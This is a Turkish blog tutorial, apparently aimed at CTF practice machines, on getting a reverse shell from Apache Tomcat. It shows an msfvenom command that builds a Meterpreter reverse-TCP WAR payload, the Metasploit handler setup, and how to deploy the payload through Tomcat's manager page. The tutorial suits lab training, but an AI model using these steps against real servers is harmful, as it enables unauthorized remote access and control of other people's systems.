Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. Siber Güvenlik
  4. »
  5. Apache Tomcat Reverse Shell Atma

Apache Tomcat Reverse Shell Atma

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 2 dk okuma süresi
193 0
Apache Tomcat Reverse Shell Alma 1

Bu yazımızda Apache Tomcat Reverse Shell Atma ele alacağız. CTF makinelerinde sıklıkça karşımıza çıkan tomcat web sunucusuna nasıl geri bağlantı alabileceğinizi anlatacağım. 

Zafiyetli makineler için: Tryhackme

Tomcat nedir?

Apache Tomcat veya Tomcat Java tabanlı web uygulamalarını yayınlamak için kullanılan web sunucusudur.

Tomcat web sunucusu önceki sürümlerinde zafiyetleri fazla olduğu için zafiyetli makinelerin içerisine sıklıkça kuruluyor. 

İlginizi çekebilecek yazımız: Bilgisayar korsanları, Trojan ve Phishing Saldırıları için ChatGPT Kullanıyor

Apache Tomcat Reverse Shell Alma

1- Terminalimize gelerekmsfvenom -p java/meterpreter/reverse_tcp LHOST=Makine ip adresiniz LPORT=Kullanmak istediniz port -f war >reverseshell.war 

Root dizinin içerisine payload olarak oluşturdu.

Apache Tomcat Reverse Shell

2-  msfconsole yazarak metasploiti çalıştırdık.

Sırasıyla;

  1. use exploit/multi/handler
  2. set payload java/meterpreter/reverse_tcp 

Exploit seçtik ve direkt olarak java reverse bağlantı almak için payloadı belirttik. Şu an ayarlamalara başlıyoruz.

Apache Tomcat Reverse Shell2

3-

  1. set LHOST Kendi makine ip adresimiz
  2. set LPORT bağlantı almak istediğimiz port
  3. run diyerek geri bağlantıyı bekleme başlıyoruz.

 

Apache Tomcat Reverse Shell 3

4-  List alanından geliyoruz ve en aşağıda ki kısma shellimizi yüklüyoruz.

 

Tomcat 4

5-  Direkt olarak dizin oluşturuldu. Üzerine tıkladığımızda terminale geri bağlantı sağlanacaktır.

6- Geri bağlantı geldi.

Shell yazarak artık sunucu içerisindeyiz. id olarak baktığımızda terminal içerisindeyiz.

CTF makinelerinde şimdiden kolaylıklar diliyorum. Umarım işine yarar, görüşmek üzere..

Tomcat 6

Sorumluluk Reddi: Bu yazıda anlatılanların tamamı bilgilendirme amaçlıdır. Kötüye kullanımda kesinlikle Siber Güvenlik Portalı olarak sorumluluk almıyoruz. 

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir